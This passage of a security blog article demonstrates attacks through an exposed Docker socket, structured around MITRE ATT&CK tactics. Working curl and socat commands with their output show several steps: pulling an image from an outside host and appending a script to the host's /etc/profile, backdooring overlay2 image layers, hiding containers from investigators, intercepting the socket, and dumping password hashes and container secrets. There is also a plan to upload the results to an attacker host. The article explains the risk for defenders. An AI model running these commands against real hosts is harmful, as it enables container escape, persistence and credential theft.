root@e7d4a65766e2:/# curl -X POST --unix-socket /var/run/docker.sock "http://localhost/v1.41/images/create?fromSrc=http://192.168.56.1:8888/evil.tar&repo=alpine%3Alatest"
{"status":"Downloading from http://192.168.56.1:8888/evil.tar"}
...
{"status":"sha256:1c11da6f8fdc5541f7ca0b4c31dfd0235c67061824f5e9170b8a2549a945ef85"}
...

The image is downloaded, we will now create a container and start it with the following:

  1. bind mount of the host filesystem named /host;
  2. execution of a simple command to append our super mega evil script from the container to the mounted host filesystem (note: we use cat to append our instructions at the end of the file in case it already exists).
root@e7d4a65766e2:/# curl -i --unix-socket /var/run/docker.sock -X POST \
    -H "Content-Type: application/json" \
    -d '{"AttachStdin":true, "AttachStdout":true, "AttachStderr":true, "Tty":true, "OpenStdin":true, "StdinOnce":true, "DetachKeys":"Ctrl-p,Ctrl-q", "Cmd":["/bin/sh", "-c", "cat 02-backup_gnome.sh >> /host/etc/profile"], "Image":"alpine", "Binds":["/:/host"]}' \
    http://localhost/containers/create

HTTP/1.1 201 Created
....
{"Id":"2a533e721d5c97ff6c74b119fc38dfb0fdb1d92e1e0d88cfc517f11428a95f9a","Warnings":[]}
root@e7d4a65766e2:/# curl -i --unix-socket /var/run/docker.sock -X POST http://localhost/containers/2a/start
HTTP/1.1 204 No Content
...

We do some cleaning by deleting our evil image:

root@e7d4a65766e2:/# curl -i --unix-socket /var/run/docker.sock -XDELETE http://localhost/containers/2a
HTTP/1.1 204 No Content
...

Later, when another user decides to open an interactive login shell on the host:

user@somehost:/ $ ssh crypto@host
crypto@host:~$ docker ps
CONTAINER ID   IMAGE        COMMAND                  CREATED         STATUS        PORTS     NAMES
8fb5ca0edaf0   alpine:2.6   "chroot /host /bin/b…"   3 seconds ago   Up 1 second             pwnedsystemd

And there is another container that just popped out with our ‘signature’ pwned.

Implant Internal Image

Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment.

Another interesting point with this scenario: every image desired to be built using as a source image the alpine:2.6 tag will end up building from the attacker crafted image having the same tag. So every container instantiated with the alpine image will contain the script put inside by the attacker.

But if an administrator does some cleaning and decides to remove our image, we lose our persistence. However, let’s look deeper in how images are built. Docker builds images using layers, typed as OverlayFS layers. They are being handled using the overlay2 driver. These layers are stored under the /var/lib/docker/overlay2 directory or /var/lib/docker/<remapping>/overlay2 if the user namespace remapping feature of docker is enabled. Have a look at the overlayFS storage driver documentation:

OverlayFS layers two directories on a single Linux host and presents them as a single directory. These directories are called layers and the unification process is referred to as a union mount. OverlayFS refers to the lower directory as lowerdir and the upper directory as upperdir. The unified view is exposed through its own directory called merged.

We will use this to obtain persistence by infecting the lowerdir of a container, in case our initial image is deleted. This means that all images constructed using this layer as part of the union mount operation will end up having this “infection”.

Here is a dummy example where we have backdoored the ping command (yes, not the most useful, but that is just an example). We first retrieve the LowerDir of a container we will export, and copy our backdoored ping to it (41c is the id of another Ubuntu container currently running on the host).

# get info about the layers of the Ubuntu container
root@:739f2eaf254f/# curl --unix-socket /var/run/docker.sock -X GET http://localhost/containers/41c/json | grep LowerDir
lowerdir":"/var/lib/docker/overlay2/74c851b2fe2df84da7a5dadf8bf487fda997948569e954e5e2f953b5fac4e52b-init/diff:/var/lib/docker/overlay2/e0b2fa36b62e947ffb36ded23b540aacf5e82afb2d3564841518555fb3584e4c/diff

We use what we have previously shown to copy the backdoored ping to /var/lib/docker/overlay2/e0b2fa36b62e947ffb36ded23b540aacf5e82afb2d3564841518555fb3584e4c/diff (yes, beloved reader, that is an exercise for you to do ;-) )

This has 2 consequences:

  1. all running containers using that base image are compromised;
  2. all future containers using that base image (and respectively this layer upon building) are compromised.

For instance, let’s start a new Ubuntu container and run ping:

host@host:~ $docker run -it --rm ubuntu /bin/bash
root@517da441f410:/# ping
You've been pwned by the master of evil containers ;)

Defense evasion

The adversary is trying to avoid being detected.

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactical techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

Let's see different tricks here too.

Indicator Removal on Host

Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.q

All the evil containers we are downloading and executing on the host are visible through a docker ps -a on the host itself. This is annoying especially since we don’t want all our super evil tools to be retrieved by the good guys.

To limit that, we can use the AutoRemove flag when we create our container, which will erase it after it exits (exactly the same as --rm on command line):

root@739f2eaf254f:~# curl --unix-socket /var/run/docker.sock -X POST \
    -H "Content-Type: application/json" \
    -d '{"AutoRemove":true, "AttachStdin":true, "AttachStdout":true, "AttachStderr":true, "Tty":true, "OpenStdin":true, "StdinOnce":true, "DetachKeys":"Ctrl-p,Ctrl-q", "Cmd":["/bin/echo", "magic"], "Image":"alpine" }' \
    http://localhost/containers/create

{"Id":"41b8ff0f7857f982ead4dcf3eb9cfdf06b0705804f43ee5ba86fe018157719c8","Warnings":[]}

Now, we can see the container from the host:

host@host:~ $ docker ps -a|grep 41b8
41b8ff0f7857   alpine       "/bin/echo magic"       30 seconds ago      Created                 distracted_hopper

The status is Created which is normal since we didn’t do anything so far. Now, let’s start the container:

root@739f2eaf254f:~# curl -i --unix-socket /var/run/docker.sock "http://localhost/containers/41b8/start" -X POST

HTTP/1.1 204 No Content
Api-Version: 1.41
...

Let’s see what we can spot from the host:

host@host:~ $ docker ps -a| grep 41b8
host@host:~ $ docker logs 41b8
Error: No such container: 41b8

Of course, the Ubuntu (739f2eaf254f) container still has proofs we abused the Docker socket, but at least, the investigation cannot retrieve the evil tools:

host@host:~ $ docker logs -n 8  73
  > root@739f2eaf254f:~# curl -i --unix-socket /var/run/docker.sock "http://localhost/containers/41b8/start" -X POST
  > HTTP/1.1 204 No Content
  > Api-Version: 1.41
  > ...

As an analyst, just looking at that, we know that container 41b8 was started, and that’s all.

There is also an interesting forcerm coming with the build API endpoint if you start playing with that on the host.

If you worked on analyzing some intrusion, you might have seen a final kill $$ in some scripts. This is used to kill the shell abruptly, preventing you from writing down the history file. This is a bit of what we achieved here (31337 p0w3R ;)

Impair Defenses

Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.

Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.

Just a quick and dirty idea too to see and possibly alter what is passed on to Docker with a man in the middle: let’s set a proxy on the Docker socket to filter the commands (Special thanks to our colleague Lo).

We will not use our usual Ubuntu container, and will explain why just after. So, let’s assume we have a container with socat installed to setup our man-in-the-middle:

host>> docker run --rm -it -v "/var/run/:/host" alpine:latest /bin/sh
/ # ls -l /host/docker.sock
srw-rw----    1 root     998              0 Aug 10 07:47 /host/docker.sock
/host # apk add socat
...
OK: 9 MiB in 23 packages
/host # mv /host/docker.sock /host/docker.sock.original
/host # socat -t100 -x -v UNIX-LISTEN:/host/docker.sock,mode=777,reuseaddr,fork UNIX-CONNECT:/host/docker.sock.original

We start the container, install socat, then move the Docker socket to replace it with our own socket created by socat. On the host where Docker daemon is running, we execute a docker ps, we can see in our MITM:

> 2021/08/17 07:05:15.402989  length=81 from=0 to=80
 48 45 41 44 20 2f 5f 70 69 6e 67 20 48 54 54 50  HEAD /_ping HTTP
 2f 31 2e 31 0d 0a                                /1.1..
 48 6f 73 74 3a 20 64 6f 63 6b 65 72 0d 0a        Host: docker..
 55 73 65 72 2d 41 67 65 6e 74 3a 20 44 6f 63 6b  User-Agent: Dock
 65 72 2d 43 6c 69 65 6e 74 2f 32 30 2e 31 30 2e  er-Client/20.10.
 36 20 28 6c 69 6e 75 78 29 0d 0a                 6 (linux)..
 0d 0a                                            ..
--
< 2021/08/17 07:05:15.403878  length=280 from=0 to=279
 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d  HTTP/1.1 200 OK.
 0a                                               .
 41 70 69 2d 56 65 72 73 69 6f 6e 3a 20 31 2e 34  Api-Version: 1.4
 31 0d 0a                                         1..
 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e  Cache-Control: n
 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72  o-cache, no-stor
 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61  e, must-revalida
 74 65 0d 0a                                      te..
 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20  Content-Length:
 30 0d 0a                                         0..
 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65  Content-Type: te
 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65  xt/plain; charse
 74 3d 75 74 66 2d 38 0d 0a                       t=utf-8..
 44 6f 63 6b 65 72 2d 45 78 70 65 72 69 6d 65 6e  Docker-Experimen
 74 61 6c 3a 20 66 61 6c 73 65 0d 0a              tal: false..
 4f 73 74 79 70 65 3a 20 6c 69 6e 75 78 0d 0a     Ostype: linux..
 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65  Pragma: no-cache
 0d 0a                                            ..
 53 65 72 76 65 72 3a 20 44 6f 63 6b 65 72 2f 32  Server: Docker/2
 30 2e 31 30 2e 36 20 28 6c 69 6e 75 78 29 0d 0a  0.10.6 (linux)..
 44 61 74 65 3a 20 54 75 65 2c 20 31 37 20 41 75  Date: Tue, 17 Au
 67 20 32 30 32 31 20 30 37 3a 30 35 3a 31 35 20  g 2021 07:05:15
 47 4d 54 0d 0a                                   GMT..
 0d 0a                                            ..
--
> 2021/08/17 07:05:15.405715  length=96 from=81 to=176
 47 45 54 20 2f 76 31 2e 34 31 2f 63 6f 6e 74 61  GET /v1.41/conta
 69 6e 65 72 73 2f 6a 73 6f 6e 20 48 54 54 50 2f  iners/json HTTP/
 31 2e 31 0d 0a                                   1.1..
...
< 2021/08/17 07:05:15.407683  length=2026 from=280 to=2305
 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d  HTTP/1.1 200 OK.
 0a                                               .
...
5b 7b 22 49 64 22 3a 22 36 39 35 34 31 64 65 37  [{"Id":"69541de7
 32 35 39 39 30 66 32 37 39 33 62 62 37 30 63 39  25990f2793bb70c9
 34 64 65 65 33 64 33 65 64 39 65 64 37 61 30 31  4dee3d3ed9ed7a01
 62 61 35 30 38 38 39 30 31 38 62 30 30 34 34 33  ba50889018b00443
 61 64 65 62 64 64 38 36 22 2c 22 4e 61 6d 65 73  adebdd86","Names
...

Instead of a “passive” sniffer, we could replace it with an active one filtering the output of every docker command (e.g. to hide attacker’s container in a docker ps), or filtering the input (e.g. a docker kill sent to one of our container).

As promised, a final word on why we couldn't use our Ubuntu image. Actually, to perform that, we needed to move the Docker socket in order to replace it with our own. However, in the Ubuntu image, we only have bind-mounted the socket itself: when we tried to move it elsewhere inside the Ubuntu container, it could not (likely because of different mount namespaces).

root@739f2eaf254f:/var/run# mv docker.sock /
mv: cannot move 'docker.sock' to '/docker.sock': Device or resource busy

Credential access

The adversary is trying to steal account names and passwords.

Credential Access consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include keylogging or credential dumping. Using legitimate credentials can give adversaries access to systems, make them harder to detect, and provide the opportunity to create more accounts to help achieve their goals.

There are many more credentials to steal when an adversary has access to the Docker daemon. We can extend MITRE’s definition to the stealing of certificates and private keys on top of the account names and passwords. We can also divide the number of credentials potentially at risk when the socket is exposed into two groups:

  • credentials from the host OS;
  • credentials from the other containers running on the host.

We will present a detailed scenario for each group.

Credentials from other containers

Stealing credentials from other containers means accessing their filesystem. Thankfully, the Docker API is resourceful and we will use one instruction we have already seen: export.

From the Ubuntu container, we will instruct the Docker socket to export the filesystem of the alpine container:

root@739f2eaf254f:/# curl --unix-socket /var/run/docker.sock http://localhost/containers/4d40/export -X GET -o x.tar
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 6573k    0 6573k    0     0  61.7M      0 --:--:-- --:--:-- --:--:-- 61.7M

Now that we have the filesystem, we can look for whatever secrets. For example:

  • /etc/shadow;
  • certificates;
  • private keys.

Of course, as we don’t like repeating actions, we can script that:

  1. list all containers;
  2. for each container:
    • export its filesystem;
    • do your magic to extract and save the secrets you want;
    • delete the export;
  3. upload the results to attacker@evil.

As seen in the Defense evasion section, remember to use --rm to erase your footprints.

Credentials from the host

We have already seen some ways to access to the host filesystem but let’s have fun with another one: a privileged container. After all, we have access to the Docker socket, so let’s abuse some privilege there.

Remember we don’t need anything special here, we just need to start a new container with the --privileged option and connect to that container.

root@739f2eaf254f:~# curl --unix-socket /var/run/docker.sock -X POST \
  -H "Content-Type: application/json"  \
  -d '{"Privileged":true, "AttachStdin":true, "AttachStdout":true, "AttachStderr":true, "Tty":true, "OpenStdin":true, "StdinOnce":true, "DetachKeys":"Ctrl-p,Ctrl-q", "Cmd":["/bin/bash"], "Image":"ubuntu" }' \
   http://localhost/containers/create

{"Id":"3306475e5b870bd10f73dd0bcf48a34777459f0ad3594f26ada4c1ebefdba653","Warnings":[]}


root@739f2eaf254f:~# curl -i --unix-socket /var/run/docker.sock "http://localhost/containers/3306/start" -X POST

HTTP/1.1 204 No Content
Api-Version: 1.41
...

root@739f2eaf254f:~# socat - UNIX-CONNECT:/var/run/docker.sock
POST /containers/3306/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
Host:
Connection: Upgrade
Upgrade: tcp


grep -a '^[a-zA-Z0-9]*:\$.\$' /dev/sda3
grep -a '^[a-zA-Z0-9]*:\$.\$' /dev/sda3
...
bob:$6$uIpLjdAOkiXw1biI$QrTijJtxf2JmyYO3TcdLaR.eDcGNO5ZVfDl25y2da5i/CVws/FNDnxy4cRNs1sLTMZDKY8pVeQnkXLlluhDY.0:18752:0:99999:7:::
john:$6$YHQn/ThUflkAWw/L$CkWP3H2ZqqxKyGv3L0xFawzE97FWMXwCrKUgA8eJiGdiPR0t5c33Vy1PFNh.Bq9bgnBVdjiJ88uXLl1YNcfbi0:18778:0:99999:7:::
...

Since our container is privileged, it can access /dev and the devices for the hard drive.

Discovery

The adversary is trying to figure out your environment.

Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act. They also allow adversaries to explore what they can control and what’s around their entry point in order to discover how it could benefit their current objective. Native operating system tools are often used toward this post-compromise information-gathering objective.

Remember how we "faked" docker ps with curl to list all containers, or docker images to list all images. We have been doing that since the beginning of the article ;-).

Impact

The adversary is trying to manipulate, interrupt, or destroy your systems and data.

Impact consists of techniques that adversaries use to disrupt availability or compromise integrity by manipulating business and operational processes

We deleted an image in the Persistence section with a simple DELETE command:

curl -i --unix-socket /var/run/docker.sock -XDELETE http://localhost/containers/2a

We could inject commands in containers to exhaust the resources (e.g. opening many files or sockets, doing fork bomb, …). Not so fun.

Conclusion

In this article, we looked deeper into the warning: don’t expose the Docker socket. We wanted to understand why and how. Luckily, the MITRE ATT&CK® matrix came out at the time we were starting writing that article, and we used it to structure our examples.

We also tried to show a few tricks around Docker or “light” Unix commands and tools. The summary is that your imagination is the only limit when you want to do evil things using the Docker socket and more generally when you have access to the host from a container. So, yes, don’t expose it and protect it seriously or your complete infrastructure will be doomed (user remap is really helpful).

Greetings

This article comes from a quote by Jérôme Petazzoni at the very beginning of one of his awesome trainings: "Don't expose your docker socket". I asked "Why?" and Jérôme replied "Because it gives control on the host and nearby containers". Then I thought: Challenge accepted! Thanks Jérôme for sharing and for feeding my curiosity.

Thanks to padawan Mihail for joining me along this work and exploring some crazy ideas with me (and supporting me while whining because my shell commands were not working ;-) ).

Comments